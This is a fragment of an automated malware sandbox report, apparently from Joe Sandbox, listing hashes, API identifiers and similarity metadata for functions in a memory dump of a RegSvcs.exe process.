                                                                                                                                                          • API String ID: 2538663250-1725878519
                                                                                                                                                          • Opcode ID: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                                                                          • Instruction ID: ba51fcffb96049ba4a9d2ecb0e51bddf3b28327b6748284e76850d605b8acc93
                                                                                                                                                          • Opcode Fuzzy Hash: e8f144b0d0e578520ae92d650570c968faa3f50811db07706bb9956ac234a523
                                                                                                                                                          • Instruction Fuzzy Hash: 0F41C9B4810B40AFD370EF39D94B7127EB8AB05250F504B1DF9E6866D4E631A4198BD7
                                                                                                                                                          Function 0040B5D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000E.00000002.58322049752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_14_2_400000_RegSvcs.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                          • String ID: :u
                                                                                                                                                          • API String ID: 3664257935-588177258
                                                                                                                                                          • Opcode ID: 62f50812e52bb63f360f50f5696872349249e40dfa0370fcd185f2f673d9e761
                                                                                                                                                          • Instruction ID: 2b90beec229bcabb032f80ab3f8ed21d398b4004671114d789e0d62637093dd3
                                                                                                                                                          • Opcode Fuzzy Hash: 62f50812e52bb63f360f50f5696872349249e40dfa0370fcd185f2f673d9e761
                                                                                                                                                          • Instruction Fuzzy Hash: F8C002394401819FDF027B64FD4D8183E79FB92746310803AE40251535DB228920AFE9